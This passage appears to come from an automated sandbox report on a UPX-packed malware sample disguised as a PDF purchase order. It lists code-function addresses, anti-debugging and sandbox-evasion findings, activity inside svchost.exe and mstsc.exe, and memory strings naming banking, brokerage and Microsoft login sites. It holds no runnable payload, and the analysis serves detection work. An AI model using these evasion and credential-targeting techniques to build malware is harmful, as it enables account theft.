            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0019AAC0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0019AAC0
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000243B7 push edi; ret 0_2_000243B9
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000243CB push edi; ret 0_2_000243CD
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001C590 push eax; retn 0001h0_2_0001C599
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003B947 push esi; ret 0_2_0003B949
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003B996 push edi; ret 0_2_0003B998
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003BA3C push edi; ret 0_2_0003BA3E
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00038AC5 push ecx; ret 0_2_00038AD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404878 push edx; iretd 2_2_00404879
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004180CC push ss; iretd 2_2_004180D7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021FE push ecx; ret 2_2_004021FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413A18 push ebx; retf 2_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041221F push ss; ret 2_2_00412220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413A23 push ebx; retf 2_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413A2E push ebx; retf 2_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004073CB push esi; ret 2_2_004073CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403380 push eax; ret 2_2_00403382
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A623 push edi; retf 2_2_0040A62D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418E2B push esi; ret 2_2_00418E2C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E76A push ebp; retf 2_2_0041E858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E71E push edx; iretd 2_2_0041E71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx2_2_03C309B6
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeCode function: 3_2_0639D02B push ss; iretd 3_2_0639D033
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeCode function: 3_2_0639C732 push es; retf 3_2_0639C749
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeCode function: 3_2_0639F3B4 push eax; ret 3_2_0639F3B6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045209AD push ecx; mov dword ptr [esp], ecx4_2_045209B6
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A18CC push es; iretd 4_2_004A18C5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_00484048 push esi; ret 4_2_0048404B
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004872A0 push edi; retf 4_2_004872AA
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0049B3E7 push ebp; retf 4_2_0049B4D5
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0049B39B push edx; iretd 4_2_0049B39C
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A043C push eax; ret 4_2_004A043D
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00014A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00014A35
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00033307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00033307
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeAPI/Special instruction interceptor: Address: 1712D54
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\mstsc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD1C0 rdtsc 2_2_03CAD1C0
            Source: C:\Windows\SysWOW64\mstsc.exeWindow / User API: threadDelayed 9839Jump to behavior
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeAPI coverage: 8.9 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 3.1 %
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe TID: 5032Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe TID: 5032Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 1476Thread sleep count: 134 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 1476Thread sleep time: -268000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 1476Thread sleep count: 9839 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 1476Thread sleep time: -19678000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0007449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_0007449B
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_0049C460 FindFirstFileW,FindNextFileW,FindClose,4_2_0049C460
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00014AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00014AFE
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696428655j
            Source: 2348427.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: merica.comVMware20,11696428655|UE
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CDYNVMware20,11696428655p
            Source: 2348427.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 2348427.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,1169642%
            Source: 2348427.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 2348427.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 2348427.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ca.comVMware20,11696428655x
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,1169642
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,1169642r
            Source: 2348427.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: actistorage_key EU WestVMware20,1169642%
            Source: 2348427.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 2348427.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 2348427.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 2348427.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 2348427.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 2348427.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 2348427.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 2348427.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000006.00000002.2463739189.000001D7B271C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 2348427.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 2348427.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,116964286
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nteractive Brokers - HKVMware20,11696428655]
            Source: 2348427.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 2348427.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 2348427.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - NDCDYNVMware20,11696428655z
            Source: 2348427.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20D
            Source: 2348427.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 2348427.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 2348427.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 2348427.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 2348427.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 2348427.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: YKkstfciYBQ.exe, 00000003.00000002.3897025898.00000000008EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
            Source: 2348427.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
            Source: 2348427.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 2348427.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 2348427.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-35511
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-36204
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD1C0 rdtsc 2_2_03CAD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004176F3 LdrLoadDll,2_2_004176F3
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0004B441 IsDebuggerPresent,OutputDebugStringW,0_2_0004B441
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00045BFC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00045BFC
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0019AAC0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0019AAC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]2_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]2_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEB3D0 mov ecx, dword ptr fs:[00000030h]2_2_03CEB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF3E6 mov eax, dword ptr fs:[00000030h]2_2_03CEF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D053FC mov eax, dword ptr fs:[00000030h]2_2_03D053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]2_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0539D mov eax, dword ptr fs:[00000030h]2_2_03D0539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A mov eax, dword ptr fs:[00000030h]2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A mov eax, dword ptr fs:[00000030h]2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C533A5 mov eax, dword ptr fs:[00000030h]2_2_03C533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C633A0 mov eax, dword ptr fs:[00000030h]2_2_03C633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C633A0 mov eax, dword ptr fs:[00000030h]2_2_03C633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C mov eax, dword ptr fs:[00000030h]2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C mov eax, dword ptr fs:[00000030h]2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05341 mov eax, dword ptr fs:[00000030h]2_2_03D05341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29353 mov eax, dword ptr fs:[00000030h]2_2_03C29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29353 mov eax, dword ptr fs:[00000030h]2_2_03C29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]2_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF367 mov eax, dword ptr fs:[00000030h]2_2_03CEF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]2_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37370 mov eax, dword ptr fs:[00000030h]2_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37370 mov eax, dword ptr fs:[00000030h]2_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37370 mov eax, dword ptr fs:[00000030h]2_2_03C37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB930B mov eax, dword ptr fs:[00000030h]2_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB930B mov eax, dword ptr fs:[00000030h]2_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB930B mov eax, dword ptr fs:[00000030h]2_2_03CB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]2_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]2_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D mov eax, dword ptr fs:[00000030h]2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D mov eax, dword ptr fs:[00000030h]2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5F32A mov eax, dword ptr fs:[00000030h]2_2_03C5F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C27330 mov eax, dword ptr fs:[00000030h]2_2_03C27330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C392C5 mov eax, dword ptr fs:[00000030h]2_2_03C392C5
